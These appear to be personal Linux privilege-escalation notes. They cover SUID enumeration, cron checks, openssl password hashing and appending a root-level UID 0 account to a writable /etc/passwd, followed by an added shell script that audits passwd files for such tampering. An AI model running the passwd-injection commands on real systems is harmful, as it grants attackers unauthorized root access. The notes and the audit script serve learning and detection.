Manual

Linux Priv Esc

• Dirty Cow
• Rational Love

check passwd file perm -- editing passwd file AI WEB

• Exploiting SUID Executables -rws

find / -perm -u=s -type f 2>/dev/null

will show the executables having the SUID bit set

find / -perm -4000 -type f 2>/dev/null

looking for cronjobs

cat /etc/cron.d

if permission denied, look in

cd /etc/cron.daily

look for installed packages

dpkg -l

if passwd file writeable

salt is limited to 2 chars, password is limited to 8 chars

openssl passwd rks
^ password

openssl passwd -salt 12 rks
^ 2-char salt to be added

openssl passwd -1 rishabhkumar
^ for md5 algo -- this allows us to put more than 8 chars of password; in the output, $1$ represents the md5 algo

openssl passwd -1 -salt yoo12 rks@123
-1 for md5, -salt for the salt, password last

https://www.youtube.com/watch?v=RGOfw-uXaFw

in linux the username is used to salt the password, so your command is going to be like

openssl passwd -1 -salt <username> <password>

openssl passwd -1 -salt rks rks@123

will get a hash -- add this hash in the shadow file or passwd file

echo 'rks:$1$rks$blahblahahs:0:0:root:/root:/bin/bash' >>/etc/passwd

su rks
rks@123 [as password]

boom root
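
A defender-side check for the end state these notes describe (a hash placed directly in the passwd file on a UID 0 line, made possible by loose file permissions). This is an added example, not part of the original notes; the function names and the sample entries are constructed.

```shell
#!/bin/sh
# Added example: flag the /etc/passwd tampering described in these notes.
# Function names and sample entries are constructed for illustration.

# Print one finding per line for a passwd-format file: "<kind> <user>".
audit_passwd() {
    awk -F: '
        $0 == "" || /^#/ { next }
        NF != 7 { print "malformed line-" NR; next }
        # Field 2 should be "x" (hash kept in /etc/shadow) or a lock marker.
        $2 != "x" && $2 != "*" && $2 !~ /^!/ {
            kind = ($2 == "") ? "empty-password" : "inline-hash"
            print kind " " $1
        }
        # Any UID 0 account other than root has full root privileges.
        $3 == 0 && $1 != "root" { print "extra-uid0 " $1 }
    ' "$1"
}

# Exit 0 if group or others may write to the file, 1 if not, 2 on error.
writable_by_others() {
    mode=$(ls -ld -- "$1" | cut -c1-10) || return 2
    case "$mode" in
        ?????w????|????????w?) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed sample: the "rks" line mimics the appended entry from the notes.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
rks:$1$rks$CONSTRUCTEDPLACEHOLDER:0:0:root:/root:/bin/bash
guest::1001:1001::/home/guest:/bin/sh
EOF
}

# Demo on the constructed sample; on a real host pass /etc/passwd instead.
tmp=$(mktemp) && sample_passwd > "$tmp" && audit_passwd "$tmp"
rm -f "$tmp"
```

Any line of output from `audit_passwd /etc/passwd`, or a zero exit status from `writable_by_others /etc/passwd`, is worth investigating.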
